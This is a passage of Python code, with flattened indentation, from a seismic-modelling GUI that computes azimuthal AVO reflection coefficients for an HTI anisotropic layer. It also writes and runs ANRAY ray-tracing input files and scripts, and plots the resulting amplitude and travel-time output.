deltae = -self.doubleSpinBox_e.value()
deltay = self.doubleSpinBox_y.value()
rmin = self.spinBox_rmin.value()
rstep = self.spinBox_rstep.value()
thick = self.spinBox_thick.value()
# critical angle of incidence
ang_critico = np.arcsin(vp1 / vp2)
ang_critico_graus = ang_critico * 180 / np.pi
ang_text = str(round(ang_critico_graus,1))
self.label_33.setText('Ângulo crítico = ' + ang_text)
# angle, geophone and travel-time calculation
ngeo = self.spinBox_ngeo.value()
if self.checkBox_solo.isChecked():
v1 = self.solo_vp.value()
v2 = self.spinBox_vp1.value()
p1 = self.solo_espessura.value()
p2 = thick
theta_solo, a = self.geofone_to_angle(ngeo, rmin, rstep, p1)
geo, time1 = self.reflect_travel_time(1, p1, theta_solo, v1, 0, 0, 0)
theta = self.geofone_to_angle_2(ngeo, rmin, rstep, v1, v2, p1, p2)
geo, time2 = self.reflect_travel_time(2, p1, 0, v1, p2, theta, v2)
self.time_basalto = time2
self.time_solo = time1
self.axes_time.plot(geo, time1, color= 'brown', label='Solo')
self.axes_time.plot(geo, time2, color= 'blue', label='Basalto')
else:
theta, a = self.geofone_to_angle(ngeo, rmin, rstep, thick)
geo, time = self.reflect_travel_time(1, thick, theta, vp1, 0, 0, 0)
self.time_basalto = time
self.axes_time.plot(geo, time, color= 'blue', label = 'Basalto')
self.axes_time.grid()
self.axes_time.legend(title='Reflexão')
self.dist = a
#Azimuths used for the reflection-coefficient calculation
phi1 = 0
phi2 = 30
phi3 = 45
phi4 = 60
phi5 = 90
A = (deltaZ / medZ) / 2
B1 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi1 * np.pi / 180), 2))
C1 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi1 * np.pi / 180), 4) + deltad * pow(np.sin(phi1 * np.pi / 180), 2) * pow(np.cos(phi1 * np.pi / 180), 2))
B2 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi2 * np.pi / 180), 2))
C2 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi2 * np.pi / 180), 4) + deltad * pow(np.sin(phi2 * np.pi / 180), 2) * pow(np.cos(phi2 * np.pi / 180), 2))
B3 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi3 * np.pi / 180), 2))
C3 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi3 * np.pi / 180), 4) + deltad * pow(np.sin(phi3 * np.pi / 180), 2) * pow(np.cos(phi3 * np.pi / 180), 2))
B4 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi4 * np.pi / 180), 2))
C4 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi4 * np.pi / 180), 4) + deltad * pow(np.sin(phi4 * np.pi / 180), 2) * pow(np.cos(phi4 * np.pi / 180), 2))
B5 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi5 * np.pi / 180), 2))
C5 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi5 * np.pi / 180), 4) + deltad * pow(np.sin(phi5 * np.pi / 180), 2) * pow(np.cos(phi5 * np.pi / 180), 2))
B_iso = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG))
C_iso = 0.5 * (deltavp / medvp)
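# The reflection coefficient is approximated with a Ruger-style azimuthal AVO form,
# R(theta, phi) = A + B(phi)*sin^2(theta) + C(phi)*sin^2(theta)*tan^2(theta), where A is the
# normal-incidence term and B, C depend on the azimuth phi through the anisotropy contrasts;
# B_iso/C_iso drop the anisotropic terms and give the isotropic reference curve.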
coef_refl1 = A + B1 * pow(np.sin(theta * np.pi / 180), 2) + C1 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl2 = A + B2 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl3 = A + B3 * pow(np.sin(theta * np.pi / 180), 2) + C3 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl4 = A + B4 * pow(np.sin(theta * np.pi / 180), 2) + C4 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl5 = A + B5 * pow(np.sin(theta * np.pi / 180), 2) + C5 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_iso = A + B_iso * pow(np.sin(theta * np.pi / 180), 2) + C_iso * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
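# Each of the blocks below compares two azimuths and marks, with coloured dots, the first
# incidence angle at which their reflection coefficients differ by more than 10%.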
if self.split_box0_90.isChecked():
dif1= np.zeros(len(coef_refl1))
for i in range(len(coef_refl1)):
if abs(coef_refl5[i]) > abs(coef_refl1[i]):
dif1[i] = abs(coef_refl5[i] - coef_refl1[i]) / abs(coef_refl1[i])
if dif1[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'ro')
self.axes.plot(theta[i], coef_refl5[i], 'ro')
break
else:
dif1[i] = abs(coef_refl1[i] - coef_refl5[i]) / abs(coef_refl5[i])
if dif1[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'ro')
self.axes.plot(theta[i], coef_refl5[i], 'ro')
break
if self.split_box0_45.isChecked():
dif2= np.zeros(len(coef_refl1))
for i in range(len(coef_refl1)):
if abs(coef_refl3[i]) > abs(coef_refl1[i]):
dif2[i] = abs(coef_refl3[i] - coef_refl1[i]) / abs(coef_refl1[i])
if dif2[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'bo')
self.axes.plot(theta[i], coef_refl3[i], 'bo')
break
else:
dif2[i] = abs(coef_refl1[i] - coef_refl3[i]) / abs(coef_refl3[i])
if dif2[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'bo')
self.axes.plot(theta[i], coef_refl3[i], 'bo')
break
if self.split_box45_90.isChecked():
dif3= np.zeros(len(coef_refl3))
for i in range(len(coef_refl3)):
if abs(coef_refl5[i]) > abs(coef_refl3[i]):
dif3[i] = abs(coef_refl5[i] - coef_refl3[i]) / abs(coef_refl3[i])
if dif3[i] > 0.1:
self.axes.plot(theta[i], coef_refl3[i], 'yo')
self.axes.plot(theta[i], coef_refl5[i], 'yo')
break
else:
dif3[i] = abs(coef_refl3[i] - coef_refl5[i]) / abs(coef_refl5[i])
if dif3[i] > 0.1:
self.axes.plot(theta[i], coef_refl3[i], 'yo')
self.axes.plot(theta[i], coef_refl5[i], 'yo')
break
if self.split_box30_60.isChecked():
dif4= np.zeros(len(coef_refl4))
for i in range(len(coef_refl4)):
if abs(coef_refl4[i]) > abs(coef_refl2[i]):
dif4[i] = abs(coef_refl4[i] - coef_refl2[i]) / abs(coef_refl2[i])
if dif4[i] > 0.1:
self.axes.plot(theta[i], coef_refl2[i], 'go')
self.axes.plot(theta[i], coef_refl4[i], 'go')
break
else:
dif4[i] = abs(coef_refl2[i] - coef_refl4[i]) / abs(coef_refl4[i])
if dif4[i] > 0.1:
self.axes.plot(theta[i], coef_refl4[i], 'go')
self.axes.plot(theta[i], coef_refl2[i], 'go')
break
self.axes.grid()
self.axes.plot(theta, coef_refl1, '+', label='0')
self.axes.plot(theta, coef_refl2, '+', label='30')
self.axes.plot(theta, coef_refl3, '+', label='45')
self.axes.plot(theta, coef_refl4, '+', label='60')
self.axes.plot(theta, coef_refl5, '+', label='90')
self.axes.plot(theta, coef_iso, label='iso', linewidth=2, linestyle='dashed', color='black')
self.axes2.set_xlim(self.axes.get_xlim())
self.axes2.set_xticks(theta)
self.axes2.set_xticklabels(a)
self.axes2.set_xlabel('Distância (m)', size=6)
for label in self.axes2.xaxis.get_ticklabels()[::2]:
label.set_visible(False)
self.axes.legend(title='Azimute', fontsize=6)
self.canvas.draw()
#Generates anray input files for the different azimuths (0, 30, 45, 60, 90)
def anray(self):
azimute = np.array([0, 30, 45, 60, 90])
self.anray_file(azimute)
#Writes the anray model file for each requested azimuth.
def anray_file(self, azimute):
azh = azimute
self.size = 0
self.progressBar.setValue(self.size)
for h in azh:
self.size = self.size + 10
self.progressBar.setValue(self.size)
file = open('modelo_anray_%s.modelo' %h, 'w')
file.write("'modelo HTI azimute %s'\n" %(h))
file.write("/\n")
if self.checkBox_solo.isChecked():
file.write('%s %s %s %s\n' % (2, 4, 10, 10))
else:
file.write('%s %s %s %s\n' % (2, 3, 10, 10))
#layer 1
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 0))
file.write('%s %s\n' % (0, 0))
#soil layer
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (self.solo_espessura.value() / 1000, self.solo_espessura.value() / 1000))
file.write('%s %s\n' % (self.solo_espessura.value() / 1000, self.solo_espessura.value() / 1000))
# layer 2
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (self.spinBox_thick.value()/1000, self.spinBox_thick.value()/1000))
file.write('%s %s\n' % (self.spinBox_thick.value()/1000, self.spinBox_thick.value()/1000))
# layer 3
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (2, 2))
#printerplot
file.write('%s %s\n%s %s\n%s %s\n' % (0, 0.5, 0.9, 1.1, 1.9, 2.1))
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (1.9, 2.1))
#specification of elastic parameters and constant density
file.write('%s %s\n' % (0, 1))
#densities
if self.checkBox_solo.isChecked():
file.write('%s '% (self.solo_densidade.value() / 1000))
file.write('%s %s\n' % (self.spinBox_p1.value()/1000, self.spinBox_p2.value()/1000))
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n%s\n' % ((self.solo_vp.value() / 1000) ** 2, (self.solo_vs.value() / 1000) ** 2)) # squared P- and S-wave velocities
#isotropic layer
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) #homogenea em x,y,z
file.write('/\n/\n/\n') #gridlines
file.write('%s\n%s\n' % ((self.spinBox_vp1.value()/1000)**2, (self.spinBox_vs1.value()/1000)**2)) #squared P- and S-wave velocities
# anisotropic layer
if self.dn == 0 and self.dt == 0:
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n%s\n' % ((self.spinBox_vp2.value() / 1000) ** 2, (self.spinBox_vs2.value() / 1000) ** 2))
else:
file.write('%s %s\n' % (1, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n' % (self.c11)) #A11
file.write('%s\n' % (self.c13)) # A12
file.write('%s\n' % (self.c13)) # A13
file.write('%s\n' % (0)) # A14
file.write('%s\n' % (0)) # A15
file.write('%s\n' % (0)) # A16
file.write('%s\n' % (self.c33)) # A22
file.write('%s\n' % (self.c23)) # A23
file.write('%s\n' % (0)) # A24
file.write('%s\n' % (0)) # A25
file.write('%s\n' % (0)) # A26
file.write('%s\n' % (self.c33)) # A33
file.write('%s\n' % (0)) # A34
file.write('%s\n' % (0)) # A35
file.write('%s\n' % (0)) # A36
file.write('%s\n' % (self.c44)) # A44
file.write('%s\n' % (0)) # A45
file.write('%s\n' % (0)) # A46
file.write('%s\n' % (self.c55)) # A55
file.write('%s\n' % (0)) # A56
file.write('%s\n' % (self.c55)) # A66
#!ICONT,MEP,MOUT,MDIM,METHOD,MREG,ITMAX,IPOL,IPREC,IRAYPL,IPRINT,IAMP,MTRNS,ICOEF,IRT,ILOC,MCOD,MORI
file.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\n' % (1, self.spinBox_ngeo.value(), 1, 1, 0, 1, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1))
#!PROF(1),RMIN,RSTEP,XPRF,YPRF
if h < 90:
az_rad = (h / 180) * np.pi
else:
az_rad = 1.5
file.write('%s %s %s %s %s\n' % (az_rad, self.spinBox_rmin.value()/1000, self.spinBox_rstep.value()/1000, 10, 10))
#!XSOUR,YSOUR,ZSOUR,TSOUR,DT,AC,REPS,PREPS
file.write('%s %s %s %s %s %s %s %s\n' % (10, 10, 0, 0, 0.04, 0.0001, 0.0005, 0.0005))
#!AMIN, ASTEP, AMAX
file.write('%s %s %s\n' % (-0.3, 0.01, 1.8))
#!BMIN, BSTEP, BMAX
file.write('%s %s %s\n' % (-0.3, 0.01, 1.8))
#!KC, KREF, ((CODE(I, K), K = 1, 2), I = 1, KREF)
file.write('%s %s %s %s %s %s\n' % (1, 2, 1, 3, 1, 3))
if self.checkBox_solo.isChecked():
file.write('%s %s %s %s %s %s %s %s %s %s\n' % (1, 4, 1, 3, 2, 3, 2, 3, 1, 3))
file.write('%s %s\n' % (0, 0))
file.write('%s/' % (0))
file.close()
self.anray_script(h)
#Builds a script that runs the models and generates the output files
def anray_script(self, azh):
files = open('anray_script%s.sh' %azh, 'w')
files.write('modname=modelo_anray\nanrayinput="$modname"_%s.modelo\n./anray <<FIM\n$anrayinput\nFIM\n\n\n' %(azh))
files.write('cp fort.30 amplitudes_%s.dat\n\n' %azh)
files.write('cp lu2.anray lu2_%s.anray' %azh)
files.close()
subprocess.call('chmod +x anray_script%s.sh' %azh, shell=True)
thread_anray = threading.Thread(target=self.anray_thr, args=(azh,))
thread_anray.start()
#Runs the script and waits for it to finish
def anray_thr(self, azh):
FNULL = open(os.devnull, 'w')
cmd = './anray_script%s.sh' % azh
p = subprocess.Popen(cmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
status = p.wait()
shutil.copy2('fort.30', '%s/HTI_P_model/amplitudes_%s.dat' %(self.anray_path, azh))
shutil.copy2('lu2.anray', '%s/HTI_P_model/lu2_%s.anray' % (self.anray_path, azh))
shutil.move('modelo_anray_%s.modelo' % azh,'%s/HTI_P_model/modelo_anray_%s.modelo' % (self.anray_path, azh))
os.remove('%s/anray_script%s.sh' %(self.anray_path, azh))
self.size = self.size + 10
self.progressBar.setValue(self.size)
if self.progressBar.value() == 100:
self.frame_7.setEnabled(True)
self.frame_8.setEnabled(True)
self.frame_11.setEnabled(True)
self.frame_13.setEnabled(True)
self.sismo_button.setEnabled(True)
self.frame_14.setEnabled(True)
self.frame_9.setEnabled(True)
if self.checkBox_solo.isChecked() == False:
self.checkBox_solo_sismo.setChecked(False)
self.checkBox_solo_sismo2.setChecked(False)
self.checkBox_solo_sismo.setEnabled(False)
self.frame_12.setEnabled(False)
self.label_47.setEnabled(False)
else:
self.frame_12.setEnabled(True)
self.checkBox_solo_sismo.setEnabled(True)
self.label_47.setEnabled(True)
self.split()
#Plots the components from the anray output and analyses the splitting
def split(self):
self.axes_anray_tot.cla()
self.axes_anray_tot2.cla()
self.axes_anray_rad.cla()
self.axes_anray_rad2.cla()
self.axes_anray_z.cla()
self.axes_anray_z2.cla()
self.axes_anray_time.cla()
self.axes_anray2_tot.cla()
self.axes_anray2_z.cla()
self.axes_anray2_time.cla()
self.axes_anray2_rad.cla()
f_0 = open('amplitudes_0.dat', "r")
f_30 = open('amplitudes_30.dat', "r")
f_45 = open('amplitudes_45.dat', "r")
f_60 = open('amplitudes_60.dat', "r")
f_90= open('amplitudes_90.dat', "r")
time_basalto = []
time_solo=[]
geofone_0 = []
x_0 = []
y_0 = []
z_0 = []
xc_0 = []
yc_0 = []
zc_0 = []
geofone_30 = []
x_30 = []
y_30 = []
z_30 = []
xc_30 = []
yc_30 = []
zc_30 = []
geofone_45 = []
x_45 = []
y_45 = []
z_45 = []
xc_45 = []
yc_45 = []
zc_45 = []
geofone_60 = []
x_60 = []
y_60 = []
z_60 = []
xc_60 = []
yc_60 = []
zc_60 = []
geofone_90 = []
x_90 = []
y_90 = []
z_90 = []
xc_90 = []
yc_90 = []
zc_90 = []
solo_x_0=[]
solo_x_30=[]
solo_x_45 = []
solo_x_60 = []
solo_x_90 = []
solo_y_0=[]
solo_y_30=[]
solo_y_45 = []
solo_y_60 = []
solo_y_90 = []
solo_z_0=[]
solo_z_30=[]
solo_z_45 = []
solo_z_60 = []
solo_z_90 = []
fase_x_0 = []
fase_x_30 = []
fase_x_45 = []
fase_x_60 = []
fase_x_90 = []
fase_y_0 = []
fase_y_30 = []
fase_y_45 = []
fase_y_60 = []
fase_y_90 = []
fase_z_0 = []
fase_z_30 = []
fase_z_45 = []
fase_z_60 = []
fase_z_90 = []
self.axes_anray_tot.set_ylabel("total")
self.axes_anray_rad.set_ylabel("radial")
self.axes_anray_z.set_ylabel("vertical")
self.axes_anray_tot.grid()
self.axes_anray_rad.grid()
self.axes_anray_z.grid()
self.axes_anray_time.grid()
self.axes_anray2_tot.set_ylabel("total")
self.axes_anray2_rad.set_ylabel("radial")
self.axes_anray2_z.set_ylabel("vertical")
self.axes_anray2_tot.grid()
self.axes_anray2_rad.grid()
self.axes_anray2_z.grid()
self.axes_anray2_time.grid()
if self.checkBox_solo.isChecked():
two_layer = True
var = 2
else:
two_layer = False
var = 1
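# Column 0 of the anray amplitude file (fort.30) appears to identify the elementary wave:
# with a soil layer present the basalt reflection is code 2 and the soil reflection code 1,
# otherwise the single reflection is code 1 (var selects which one is read below).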
for line in f_0:
coluna = line.split()
if float(coluna[0]) == var:
geofone_0.append(int(coluna[1]))
#real part
x_0.append(float(coluna[3]))
y_0.append(float(coluna[5]))
z_0.append(float(coluna[7]))
#imaginary part
xc_0.append(float(coluna[4]))
yc_0.append(float(coluna[6]))
zc_0.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 2:
time_basalto.append(float(coluna[2]))
else :
time_solo.append(float(coluna[2]))
solo_x_0.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_0.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_0.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_0.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_0.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_0.append(np.arctan2(float(coluna[8]), float(coluna[7])))
if two_layer == False:
time_basalto.append(float(coluna[2]))
f_0.close()
geo_0 = np.asarray(geofone_0)
time_basalto = np.asarray(time_basalto)
time_solo = np.asarray(time_solo)
x_0 = np.asarray(x_0)
y_0 = np.asarray(y_0)
z_0 = np.asarray(z_0)
xc_0 = np.asarray(xc_0)
yc_0 = np.asarray(yc_0)
zc_0 = np.asarray(zc_0)
solo_x_0 = np.asarray(solo_x_0)
solo_x_0 = np.fliplr([solo_x_0])[0]
solo_y_0 = np.asarray(solo_y_0)
solo_y_0 = np.fliplr([solo_y_0])[0]
solo_z_0 = np.asarray(solo_z_0)
solo_z_0 = np.fliplr([solo_z_0])[0]
fase_x_0 = np.asarray(fase_x_0)
fase_x_0 = np.fliplr([fase_x_0])[0]
fase_y_0 = np.asarray(fase_y_0)
fase_y_0 = np.fliplr([fase_y_0])[0]
fase_z_0 = np.asarray(fase_z_0)
fase_z_0 = np.fliplr([fase_z_0])[0]
solo_rad_0 = np.sqrt(solo_x_0 ** 2 + solo_y_0 ** 2)
self.solo_fase_rad = fase_x_0 + fase_y_0
self.solo_fase_z = fase_z_0
solo_0_tot = np.sqrt(solo_x_0 ** 2 + solo_y_0 ** 2 + solo_z_0 ** 2)
self.refl_solo_rad_0 = solo_rad_0
self.refl_solo_z_0 = solo_z_0
self.time_basalto = np.fliplr([time_basalto])[0]
self.time_solo = np.fliplr([time_solo])[0]
x0_re = np.fliplr([x_0])[0]
y0_re = np.fliplr([y_0])[0]
z0_re = np.fliplr([z_0])[0]
x0c_re = np.fliplr([xc_0])[0]
y0c_re = np.fliplr([yc_0])[0]
z0c_re = np.fliplr([zc_0])[0]
ampx_0 = np.sqrt(x0_re**2 + x0c_re**2)
ampy_0 = np.sqrt(y0_re **2 + y0c_re ** 2)
ampz_0 = np.sqrt(z0_re **2 + z0c_re ** 2)
phx_0 = np.arctan2(x0c_re,x0_re)
phy_0 = np.arctan2(y0c_re, y0_re)
phz_0 = np.arctan2(z0c_re, z0_re)
self.hti_fase_rad_0 = phx_0
self.hti_fase_z_0 = phz_0
geo0_re = self.dist
tot0 = np.sqrt(ampx_0 ** 2 + ampy_0 ** 2 + ampz_0 ** 2)
rad_0 = np.sqrt(ampx_0 ** 2 + ampy_0 ** 2)
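# The real/imaginary columns have been combined into amplitude and phase per component;
# tot0 is the magnitude of the full displacement vector and rad_0 its horizontal (radial)
# part, plotted against the geophone offsets stored in self.dist.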
self.axes_anray_tot.plot(geo0_re, tot0, label=0)
self.refl_tot_0 = tot0
self.refl_rad_0 = rad_0
self.refl_z_0 = ampz_0
self.axes_anray_z.plot(geo0_re, ampz_0, label=0)
self.axes_anray_rad.plot(geo0_re, rad_0, label=0)
try:
if two_layer==True:
self.axes_anray2_tot.plot(geo0_re, solo_0_tot, label=0)
self.axes_anray2_rad.plot(geo0_re, solo_rad_0, label=0)
self.axes_anray2_z.plot(geo0_re, solo_z_0, label=0)
if two_layer == True:
self.axes_anray_time.plot(geo0_re, self.time_basalto, color='blue')
self.axes_anray2_time.plot(geo0_re, self.time_solo, color='brown')
else:
self.axes_anray_time.plot(geo0_re, self.time_basalto, color='blue')
self.axes_anray_time.set_ylabel('tempo (s)')
self.axes_anray2_time.set_ylabel('tempo (s)')
for line in f_30:
coluna = line.split()
if float(coluna[0]) == var:
geofone_30.append(int(coluna[1]))
x_30.append(float(coluna[3]))
y_30.append(float(coluna[5]))
z_30.append(float(coluna[7]))
xc_30.append(float(coluna[4]))
yc_30.append(float(coluna[6]))
zc_30.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_30.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_30.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_30.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_30.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_30.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_30.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_30.close()
geo_30 = np.asarray(geofone_30)
x_30 = np.asarray(x_30)
y_30 = np.asarray(y_30)
z_30 = np.asarray(z_30)
xc_30 = np.asarray(xc_30)
yc_30 = np.asarray(yc_30)
zc_30 = np.asarray(zc_30)
x30_re = np.fliplr([x_30])[0]
y30_re = np.fliplr([y_30])[0]
z30_re = np.fliplr([z_30])[0]
x30c_re = np.fliplr([xc_30])[0]
y30c_re = np.fliplr([yc_30])[0]
z30c_re = np.fliplr([zc_30])[0]
ampx_30 = np.sqrt(x30_re ** 2 + x30c_re ** 2)
ampy_30 = np.sqrt(y30_re ** 2 + y30c_re ** 2)
ampz_30 = np.sqrt(z30_re ** 2 + z30c_re ** 2)
phx_30 = np.arctan2(x30c_re, x30_re)
phy_30 = np.arctan2(y30c_re, y30_re)
phz_30 = np.arctan2(z30c_re, z30_re)
self.hti_fase_rad_30 = phx_30
self.hti_fase_z_30 = phz_30
geo30_re = self.dist
tot30 = np.sqrt(ampx_30 ** 2 + ampy_30 ** 2 + ampz_30 ** 2)
rad_30 = np.sqrt(ampx_30 ** 2 + ampy_30 ** 2)
solo_x_30 = np.asarray(solo_x_30)
solo_x_30 = np.fliplr([solo_x_30])[0]
solo_y_30 = np.asarray(solo_y_30)
solo_y_30 = np.fliplr([solo_y_30])[0]
solo_z_30 = np.asarray(solo_z_30)
solo_z_30 = np.fliplr([solo_z_30])[0]
solo_30_tot = np.sqrt(solo_x_30 ** 2 + solo_y_30 ** 2 + solo_z_30 ** 2)
solo_rad_30 = np.sqrt(solo_x_30 ** 2 + solo_y_30 ** 2)
fase_x_30 = np.asarray(fase_x_30)
fase_x_30 = np.fliplr([fase_x_30])[0]
fase_y_30 = np.asarray(fase_y_30)
fase_y_30 = np.fliplr([fase_y_30])[0]
fase_z_30 = np.asarray(fase_z_30)
fase_z_30 = np.fliplr([fase_z_30])[0]
self.refl_solo_x_30 = solo_rad_30
self.refl_solo_y_30 = solo_y_30
self.refl_solo_z_30 = solo_z_30
self.refl_tot_30 = tot30
self.refl_rad_30 = rad_30
self.refl_y_30 = y30_re
self.refl_z_30 = ampz_30
self.axes_anray_tot.plot(geo30_re, tot30, label=30)
self.axes_anray_rad.plot(geo30_re, rad_30, label=30)
self.axes_anray_z.plot(geo30_re, ampz_30, label=30)
if two_layer == True:
self.axes_anray2_z.plot(geo30_re, solo_z_30, label=30)
self.axes_anray2_tot.plot(geo30_re, solo_30_tot, label=30)
self.axes_anray2_rad.plot(geo30_re, solo_rad_30, label=30)
for line in f_45:
coluna = line.split()
if float(coluna[0]) == var:
geofone_45.append(int(coluna[1]))
x_45.append(float(coluna[3]))
y_45.append(float(coluna[5]))
z_45.append(float(coluna[7]))
xc_45.append(float(coluna[4]))
yc_45.append(float(coluna[6]))
zc_45.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_45.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_45.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_45.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_45.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_45.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_45.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_45.close()
geo_45 = np.asarray(geofone_45)
x_45 = np.asarray(x_45)
y_45 = np.asarray(y_45)
z_45 = np.asarray(z_45)
xc_45 = np.asarray(xc_45)
yc_45 = np.asarray(yc_45)
zc_45 = np.asarray(zc_45)
x45_re = np.fliplr([x_45])[0]
y45_re = np.fliplr([y_45])[0]
z45_re = np.fliplr([z_45])[0]
x45c_re = np.fliplr([xc_45])[0]
y45c_re = np.fliplr([yc_45])[0]
z45c_re = np.fliplr([zc_45])[0]
ampx_45 = np.sqrt(x45_re ** 2 + x45c_re ** 2)
ampy_45 = np.sqrt(y45_re ** 2 + y45c_re ** 2)
ampz_45 = np.sqrt(z45_re ** 2 + z45c_re ** 2)
phx_45 = np.arctan2(x45c_re, x45_re)
phy_45 = np.arctan2(y45c_re, y45_re)
phz_45 = np.arctan2(z45c_re, z45_re)
self.hti_fase_rad_45 = phx_45
self.hti_fase_z_45 = phz_45
geo45_re = self.dist
tot45 = np.sqrt(ampx_45 ** 2 + ampy_45 ** 2 + ampz_45 ** 2)
rad_45 = np.sqrt(ampx_45 ** 2 + ampy_45 ** 2)
solo_x_45 = np.asarray(solo_x_45)
solo_x_45 = np.fliplr([solo_x_45])[0]
solo_y_45 = np.asarray(solo_y_45)
solo_y_45 = np.fliplr([solo_y_45])[0]
solo_z_45 = np.asarray(solo_z_45)
solo_z_45 = np.fliplr([solo_z_45])[0]
solo_45_tot = np.sqrt(solo_x_45 ** 2 + solo_y_45 ** 2 + solo_z_45 ** 2)
solo_rad_45 = np.sqrt(solo_x_45 ** 2 + solo_y_45 ** 2)
fase_x_45 = np.asarray(fase_x_45)
fase_x_45 = np.fliplr([fase_x_45])[0]
fase_y_45 = np.asarray(fase_y_45)
fase_y_45 = np.fliplr([fase_y_45])[0]
fase_z_45 = np.asarray(fase_z_45)
fase_z_45 = np.fliplr([fase_z_45])[0]
self.refl_solo_x_45 = solo_rad_45
self.refl_solo_y_45 = solo_y_45
self.refl_solo_z_45 = solo_z_45
self.refl_tot_45 = tot45
self.refl_rad_45 = rad_45
self.refl_y_45 = y45_re
self.refl_z_45 = ampz_45
self.axes_anray_tot.plot(geo45_re, tot45, label=45)
self.axes_anray_rad.plot(geo45_re, rad_45, label=45)
self.axes_anray_z.plot(geo45_re, ampz_45, label=45)
if two_layer == True:
self.axes_anray2_z.plot(geo45_re, solo_z_45, label=45)
self.axes_anray2_tot.plot(geo45_re, solo_45_tot, label=45)
self.axes_anray2_rad.plot(geo45_re, solo_rad_45, label=45)
for line in f_60:
coluna = line.split()
if float(coluna[0]) == var:
geofone_60.append(int(coluna[1]))
x_60.append(float(coluna[3]))
y_60.append(float(coluna[5]))
z_60.append(float(coluna[7]))
xc_60.append(float(coluna[4]))
yc_60.append(float(coluna[6]))
zc_60.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_60.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_60.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_60.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_60.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_60.append(np.arctan2(float(coluna[6]), float(coluna[5])))
